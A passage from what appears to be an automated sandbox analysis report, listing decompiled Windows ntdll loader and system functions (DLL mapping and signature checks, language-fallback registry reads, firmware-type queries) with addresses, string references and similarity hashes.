														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01002280(_t108, 0x10d86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E010161A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E010B9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E00FFFFB0(_t118, _t156, 0x10d86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01029A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x00ff8799
0x00ff879d
0x00ff87a1
0x00ff87a3
0x00ff87a8
0x00ff87c3
0x00ff87c3
0x00ff87c8
0x00ff87d1
0x00ff87d4
0x00ff87d8
0x00ff87e5
0x00ff87ec
0x01049bfe
0x01049c00
0x01049c02
0x01049c08
0x01049c0d
0x01049c0f
0x01049c14
0x01049c2d
0x01049c32
0x01049c37
0x01049c3a
0x01049c3c
0x01049c42
0x01049c42
0x01049c3c
0x01049c02
0x00ff87da
0x00ff87df
0x00ff87e3
0x00000000
0x00000000
0x00ff87e3
0x00ff87f2
0x00000000
0x00ff87fb
0x00ff87fd
0x00ff87fe
0x00ff880e
0x00ff880f
0x00ff8810
0x00ff8814
0x00ff881a
0x00ff881c
0x00ff881f
0x00ff8821
0x00ff8822
0x00ff8824
0x00ff8826
0x00ff882c
0x00ff882e
0x01049c48
0x01049c48
0x00ff8834
0x00ff8834
0x00ff8837
0x00000000
0x00000000
0x00ff8837
0x00ff882e
0x00ff883d
0x00ff8840
0x00ff8843
0x00ff8846
0x00ff8849
0x00ff884c
0x00ff884e
0x00ff8850
0x00ff8852
0x00ff8854
0x00ff8857
0x00ff88b4
0x00ff88b6
0x00ff88b6
0x00ff8859
0x00ff8859
0x00ff8859
0x00ff8861
0x00ff8866
0x00ff886a
0x00ff893d
0x00ff8941
0x00000000
0x00ff8947
0x00ff8947
0x00ff894a
0x00ff894c
0x00000000
0x00ff8952
0x00ff8955
0x00ff895a
0x00ff895d
0x00ff895d
0x00ff895f
0x00ff8961
0x00ff8961
0x00ff8968
0x00000000
0x00000000
0x00ff896a
0x00ff896b
0x00ff896e
0x00000000
0x00ff8970
0x00ff8970
0x00ff8970
0x00ff8970
0x00ff8972
0x00ff8972
0x00ff8974
0x00000000
0x00ff897a
0x00ff897a
0x00ff897d
0x00000000
0x00ff8983
0x01049c65
0x01049c6d
0x01049c72
0x01049c75
0x01049c75
0x01049c82
0x01049c86
0x01049c87
0x01049c88
0x01049c89
0x01049c8c
0x01049c90
0x01049c95
0x01049c97
0x01049ca0
0x01049ca3
0x01049ca9
0x01049ca9
0x00000000
0x01049ca9
0x01049ca3
0x00000000
0x01049c97
0x00ff897d
0x00000000
0x00ff8974
0x00ff8988
0x00ff8992
0x00ff8996
0x00000000
0x00ff8996
0x00ff894c
0x00000000
0x00ff8870
0x00ff887b
0x00ff887d
0x00ff887f
0x00ff8881
0x00ff8884
0x00ff8884
0x00ff8886
0x00ff8889
0x00ff888c
0x00ff888e
0x00ff8891
0x00ff8891
0x00ff8898
0x00000000
0x00000000
0x00ff889a
0x00ff889b
0x00ff889e
0x00000000
0x00000000
0x00ff88a0
0x00ff88a8
0x00ff88b0
0x00ff88b2
0x00ff88d3
0x00ff88d5
0x00000000
0x00ff88d7
0x00ff88db
0x00ff88dc
0x00ff88e0
0x00ff88e8
0x00ff88ee
0x00ff88f0
0x00ff88f3
0x00ff88fc
0x00ff8901
0x00ff8906
0x00ff890c
0x00ff890c
0x00ff890f
0x00ff8916
0x00ff8917
0x00ff8918
0x00ff8919
0x00ff891a
0x00ff891f
0x00ff8921
0x01049c52
0x01049c55
0x01049c5b
0x01049cac
0x01049cc0
0x01049cc0
0x01049c55
0x00ff8927
0x00ff8927
0x00ff892f
0x00ff8933
0x00000000
0x00ff88f5
0x00ff88f5
0x00000000
0x00ff88f7
0x00ff88f7
0x00ff88fa
0x00000000
0x00000000
0x00000000
0x00000000
0x00ff88fa
0x00ff88f5
0x00ff88f3
0x00000000
0x00ff88d5
0x00000000
0x00ff88b2
0x00ff88c9
0x00000000
0x00ff88c9
0x00ff887f
0x00ff886a
0x00ff8857
0x00ff8852
0x00ff88bf
0x00ff88bf
0x00ff87aa
0x00ff87ad
0x00ff87ae
0x00ff87b4
0x00ff87b5
0x00ff87b6
0x00ff87b8
0x00ff87bd
0x00ff87c1
0x00ff87f4
0x00ff87fa
0x00000000
0x00000000
0x00000000
0x00ff87c1
0x00000000

Strings

LdrpDoPostSnapWork, xrefs: 01049C1E
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01049C18
minkernel\ntdll\ldrsnap.c, xrefs: 01049C28

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: 3c49fed73d3aacf3d5e36414eba7225bfe64aec46b577b1dcee9fa94bbc8373d
Instruction ID: 3ceba34ab0b283dc1b4bce1900ab90c69d1003bc1a1573607350b4abb8bb20da
Opcode Fuzzy Hash: 3c49fed73d3aacf3d5e36414eba7225bfe64aec46b577b1dcee9fa94bbc8373d
Instruction Fuzzy Hash: 10910672A0021EDFDF28DF59C8C1ABA77B5FF44394B544169EA41AB260DB70ED02DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FF7E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00FF7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E00FFCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E00FEC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x10d5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01065510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x10d5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01007D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01007D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01067016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01007D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01007D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01067016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0101A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E00FEB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x00ff7e4c
0x00ff7e50
0x00ff7e55
0x00ff7e58
0x00ff7e5d
0x00ff7e71
0x00ff7f33
0x00ff7e77
0x00ff7e77
0x00ff7e79
0x00ff7e79
0x00ff7e7e
0x00ff7f45
0x01049848
0x00000000
0x01049848
0x00ff7f4e
0x00ff7f53
0x00ff7f5a
0x00000000
0x00000000
0x0104985a
0x01049862
0x01049866
0x00000000
0x0104986c
0x00000000
0x0104986c
0x00ff7e84
0x00ff7e84
0x00ff7e8d
0x01049871
0x00ff7eb8
0x00ff7ec0
0x00ff7ec0
0x00ff7e9a
0x0104987e
0x00000000
0x00000000
0x01049884
0x0104988b
0x010498a7
0x010498ac
0x010498b1
0x010498b6
0x010498b8
0x010498b8
0x010498b9
0x00000000
0x010498b9
0x00ff7ea0
0x00ff7ea7
0x00000000
0x00000000
0x00ff7eac
0x00ff7eb1
0x00ff7ec6
0x00ff7ed0
0x010498cc
0x00ff7ed6
0x00ff7ed6
0x00ff7ed6
0x00ff7ede
0x00ff7ee3
0x010498e3
0x010498f0
0x01049902
0x010498f2
0x010498fb
0x010498fb
0x01049907
0x0104991d
0x0104991d
0x01049907
0x010498e3
0x00ff7ef0
0x00ff7f14
0x00ff7f14
0x00ff7f1e
0x01049946
0x00ff7f24
0x00ff7f24
0x00ff7f24
0x00ff7f2c
0x0104996a
0x01049975
0x01049975
0x0104997e
0x01049993
0x01049993
0x0104997e
0x00000000
0x00ff7ef2
0x00ff7efc
0x00ff7f0a
0x00ff7f0e
0x01049933
0x00000000
0x01049933
0x00000000
0x00ff7f0e
0x00000000
0x00000000
0x00000000
0x00ff7eb1

Strings

minkernel\ntdll\ldrmap.c, xrefs: 010498A2
Could not validate the crypto signature for DLL %wZ, xrefs: 01049891
LdrpCompleteMapModule, xrefs: 01049898

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 0708b5f926d0a8ddff9e37676336e96097b02ceb94dd3ae83bc3fe702fb8cf60
Instruction ID: 7101b3ed0d1a25a08e89ea2e09f1deb5f0970211734b92dc075fdbcec4177115
Opcode Fuzzy Hash: 0708b5f926d0a8ddff9e37676336e96097b02ceb94dd3ae83bc3fe702fb8cf60
Instruction Fuzzy Hash: 42510372A08749DBE721DB5CC984B7ABBE4AF04324F1405EAEA919B3E1D774ED00D790

Uniqueness

Uniqueness Score: -1.00%

Function 00FEE620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00FEE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E00FEF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E010295D0();
						}
						if(_t78 != 0) {
							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0102FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0102BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01029600();
					if(_t97 < 0) {
						goto L6;
					}
					E0102BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L00FEF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0102BB40(_t83, _t102 + 0x24, _t78);
								if(L00FF43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0102BB40(_t84, _t102 + 0x24, _t94);
									if(L00FF43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x00fee620
0x00fee628
0x00fee62f
0x00fee631
0x00fee635
0x00fee637
0x00fee63e
0x01045503
0x01045503
0x00fee64c
0x00fee64c
0x00fee651
0x00000000
0x00000000
0x00fee661
0x00fee665
0x0104542a
0x00fee715
0x00fee71a
0x00fee71c
0x00fee720
0x00fee720
0x00fee727
0x00fee736
0x00fee736
0x00fee743
0x00fee743
0x00fee673
0x00fee678
0x00fee67d
0x00fee682
0x00fee685
0x00fee692
0x00fee69b
0x00fee6a3
0x00fee6ad
0x00fee6b1
0x00fee6b2
0x00fee6bb
0x00fee6bf
0x00fee6c0
0x00fee6c8
0x00fee6cc
0x00fee6d5
0x00fee6d9
0x00000000
0x00000000
0x00fee6e5
0x00fee6ea
0x00fee6f9
0x00fee70b
0x00fee70f
0x01045439
0x0104545e
0x0104545e
0x00000000
0x0104545e
0x0104543b
0x0104543e
0x01045440
0x01045445
0x01045472
0x01045475
0x0104548d
0x01045493
0x010454a9
0x00000000
0x00000000
0x010454ab
0x010454b4
0x010454bc
0x010454c8
0x010454de
0x010454fb
0x010454e0
0x010454e6
0x010454eb
0x010454eb
0x010454de
0x00000000
0x010454bc
0x01045477
0x0104547a
0x01045480
0x01045483
0x01045486
0x0104548b
0x00000000
0x00000000
0x00000000
0x0104548b
0x00000000
0x00000000
0x00000000
0x00000000
0x01045447
0x01045447
0x01045447
0x01045447
0x0104544e
0x00000000
0x00000000
0x01045450
0x01045452
0x01045455
0x0104545a
0x00000000
0x00000000
0x00000000
0x0104545c
0x0104546a
0x0104546d
0x0104546f
0x00000000
0x0104546f
0x00fee70f

Strings

InstallLanguageFallback, xrefs: 00FEE6DB
@, xrefs: 00FEE6C0
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00FEE68C

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 29e4303ff2990e91ac7a3a569fa2df0f1d99481d55df4d8b5e2cf17614277a59
Instruction ID: ef00adae1cbc27d5b81346d2d65f49de794019e3bc350f53130d69b24f1b5569
Opcode Fuzzy Hash: 29e4303ff2990e91ac7a3a569fa2df0f1d99481d55df4d8b5e2cf17614277a59
Instruction Fuzzy Hash: A351A0B66043569BD711DF28C890AABB3E8BF88714F04097EF995D7240FB34DA04C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 010651BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E010651BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x10c05f0);
				E0103D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E00FFEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E010653CA(0);
						return E0103D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0102F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01003690(1, _t117, 0xfc1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0102AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01004620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0102AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0106500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01029860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x010651be
0x010651c3
0x010651c8
0x010651cd
0x010651d0
0x010651d3
0x010651d8
0x010651db
0x010651de
0x010651e0
0x010651e3
0x010651e6
0x010651e8
0x01065342
0x01065351
0x01065356
0x0106535a
0x01065360
0x01065363
0x01065366
0x01065369
0x01065369
0x0106536b
0x0106536b
0x01065370
0x010653a3
0x010653a4
0x010653a6
0x010653ab
0x010653ab
0x010653ae
0x010653ae
0x010653b5
0x010653bf
0x010653bf
0x01065375
0x01065396
0x010653a0
0x010653a0
0x00000000
0x01065396
0x01065377
0x01065379
0x0106537f
0x0106538c
0x01065390
0x00000000
0x01065390
0x010651ee
0x010651f1
0x01065301
0x01065310
0x01065315
0x01065318
0x0106531b
0x01065320
0x0106532e
0x01065331
0x00000000
0x01065331
0x01065328
0x01065329
0x00000000
0x01065329
0x010651fa
0x01065235
0x01065236
0x01065239
0x0106523f
0x01065240
0x01065241
0x01065242
0x01065246
0x01065247
0x0106524e
0x01065251
0x01065267
0x01065269
0x0106526e
0x0106527d
0x0106527e
0x01065281
0x01065282
0x01065287
0x01065288
0x0106528a
0x0106528f
0x01065294
0x00000000
0x00000000
0x0106529a
0x0106529c
0x0106529e
0x0106529e
0x010652a4
0x010652b0
0x00000000
0x00000000
0x010652ba
0x010652bc
0x010652bc
0x010652d4
0x010652d9
0x010652dc
0x010652e1
0x00000000
0x00000000
0x010652e7
0x010652f4
0x00000000
0x010652f4
0x01065270
0x00000000
0x01065270
0x010651fc
0x010651fd
0x01065202
0x01065203
0x01065205
0x0106520a
0x0106520f
0x00000000
0x00000000
0x0106521b
0x01065226
0x0106522b
0x0106521d
0x0106521d
0x01065222
0x01065222
0x0106522d
0x00000000

Strings

UEFI, xrefs: 0106521D
Legacy, xrefs: 01065226

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 27c6ee239f5b2eaa600cd03496deae4fba3e420246e108720e55bd5c29c41fab
Instruction ID: 122933dc0bdde9ee1c66bef31de420ef0877b5863a097cc5e82ea0c876e6fe7b
Opcode Fuzzy Hash: 27c6ee239f5b2eaa600cd03496deae4fba3e420246e108720e55bd5c29c41fab
Instruction Fuzzy Hash: BF514D71A0061A9FDB25DFA8CD40BAEBBF8FF48740F14806DE689EB291D7719940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0100B944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0100B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x10dd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01007D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E010B8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01029E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0102B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0102CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
